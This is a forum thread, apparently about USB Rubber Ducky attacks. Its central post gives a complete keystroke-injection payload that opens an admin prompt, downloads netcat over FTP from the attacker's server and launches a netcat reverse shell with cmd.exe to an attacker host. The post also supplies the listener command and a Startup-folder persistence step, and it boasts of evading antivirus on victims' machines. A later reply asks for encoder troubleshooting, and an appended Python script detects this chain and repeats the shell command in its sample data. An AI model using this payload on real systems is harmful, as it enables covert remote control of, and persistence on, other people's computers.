
D0oM

  1. Let me know what you think guys. I know this one may be annoying because of the FTP server aspect of it. But if you end up trying it I assure you, you won't be disappointed. If I find any anonymous servers with anonymous upload on I will be sure to post them.
  2. My Strictly Netcat Reverse Shell

     OK, this has a few requirements, so it is not that user-friendly, but I like this method because after a few tests it has not been detected by any AV or other types of security programs. Works on Windows 7.

     The first requirement is an FTP server. All Windows boxes include an FTP client by default; that's what I will be using to download the nc.exe and startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this, but good luck finding one. So you will probably have to run an FTP server yourself like I have done.

     So once you have an FTP server up and running, download the Windows version of netcat, unzip it and put the files into a directory called /tools/nc in the root directory of the user you're logging in with (you can always change my code so your ducky script will look in the specific directory you want it to for the nc files). Download the Windows version of netcat here: http://www.downloadnetcat.com/. Scroll down and select download netcat Windows version.

     Now make a .bat file and add one line to it:

         start nc yourserver.dyndns.org 8080 -d -e cmd.exe

     Add that .bat file to the same directory your netcat files are in. In my case, /tools/nc.

     Now on your attacking computer you must listen for the incoming connection with this command:

         nc -l -p 8080

     Also remember to port forward port 8080 on your router to your internal listening attack computer!

     Now that you have everything set up, you are ready to put the ducky into a victim's computer anywhere in the world. The only thing that can stop this is if the victim's network for some reason blocks 8080 incoming or outgoing. In that case just change the port number. I've tested this on a few Windows 7 systems and it went undetected on all of them. Each one had antivirus such as McAfee and Norton. Firewalls on as well.

         ESCAPE
         CONTROL ESCAPE
         DELAY 900
         STRING cmd
         DELAY 900
         MENU
         DELAY 900
         STRING a
         DELAY 900
         ENTER
         DELAY 1800
         LEFTARROW
         DELAY 900
         ENTER
         DELAY 900
         STRING ftp
         ENTER
         DELAY 600
         STRING open yourftpservernamehere.dyndns.org
         ENTER
         DELAY 900
         STRING FtpUsernameHere
         ENTER
         DELAY 900
         STRING YourFtpServersUsernamesPasswdHere
         DELAY 500
         ENTER
         DELAY 1000
         STRING cd tools
         ENTER
         DELAY 900
         STRING cd nc
         DELAY 900
         ENTER
         STRING mget *
         DELAY 800
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 900
         ENTER
         DELAY 500
         ENTER
         STRING quit
         ENTER
         DELAY 400
         STRING start nc yourlisteningsevernamehere.dyndns.org 8080 -d -e cmd.exe
         ENTER
         DELAY 400
         STRING exit
         ENTER

     Now once you're inside the victim's computer, issue the command:

         move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

     Now their computer will run your netcat reverse shell whenever it boots.

     You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers, which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent of the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt, leaving fewer traces of the backdoor. So the only way the victim will see the backdoor is if they check things like Task Manager.
  3. I'm just going to post here rather than make a whole new thread. Just tell me off if I'm derailing your thread. Anyways.. I got my duck today and I've been trying to get my payloads to work all night. When I plug the duck into my Win7 it sees it fine and installs drivers fine, although my payloads don't run. Not even the simple Bart Simpson payload. After I ran my java command

         java -jar /duckencode.jar -i reverse.txt -o /media/0007-545F/inject.bin

     I ran cat on my inject.bin file and there was no data in it. No unintelligible binary code or anything in sight. So I think my inject.bin file is not being created or something. Please help.
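
A defender's view of the chain described in the netcat post above, as an added example that is not part of the original posts: the three steps (ftp.exe download, a process started with `-e cmd.exe`, a script landing in the Startup folder) each leave an event that can be matched and correlated per host. The event field names, host names and sample records are constructed assumptions, not a real log schema.

```python
import re
import ntpath

# Match the "-e cmd.exe" argument itself, so the rule does not depend on the binary's name.
SHELL_ARG = re.compile(r'(?:^|\s)-e\s+"?(?:cmd|powershell)(?:\.exe)?\b', re.I)
# Suffix shared by the all-users and per-user Startup folders.
STARTUP = r"\microsoft\windows\start menu\programs\startup"
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".exe"}

def classify(ev):
    """Return the rule names matched by one event (kind 'proc' or 'file')."""
    hits = set()
    if ev["kind"] == "proc":
        if ntpath.basename(ev["image"]).lower() == "ftp.exe":
            hits.add("ftp_client")
        if SHELL_ARG.search(ev["cmdline"]):
            hits.add("shell_over_socket")
    elif ev["kind"] == "file":
        # "move" is a cmd.exe builtin and creates no process, so the Startup
        # drop is matched on the file-creation event rather than a command line.
        folder, name = ntpath.split(ev["path"].lower())
        if folder.endswith(STARTUP) and ntpath.splitext(name)[1] in SCRIPT_EXT:
            hits.add("startup_drop")
    return hits

def triage(events):
    """Per host: matched rules, rated 'chain' when download and shell both appear."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(classify(ev))
    return {h: ("chain" if {"ftp_client", "shell_over_socket"} <= r else "single", sorted(r))
            for h, r in per_host.items() if r}

# Constructed sample events.
SAMPLE = [
    {"host": "WS01", "kind": "proc", "image": r"C:\Windows\System32\ftp.exe", "cmdline": "ftp"},
    {"host": "WS01", "kind": "proc", "image": r"C:\Users\u\nc.exe",
     "cmdline": "nc listener.example.invalid 8080 -d -e cmd.exe"},
    {"host": "WS01", "kind": "file",
     "path": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\job.bat"},
    {"host": "WS02", "kind": "proc", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
    {"host": "WS03", "kind": "proc", "image": r"C:\Windows\System32\ftp.exe", "cmdline": "ftp -s:nightly.txt"},
]

if __name__ == "__main__":
    for host, (level, rules) in sorted(triage(SAMPLE).items()):
        print(host, level, rules)
```

A lone `ftp_client` hit (WS03 here) is common on networks that still script FTP transfers, which is why only the combination with a shell-bound process is rated as a chain.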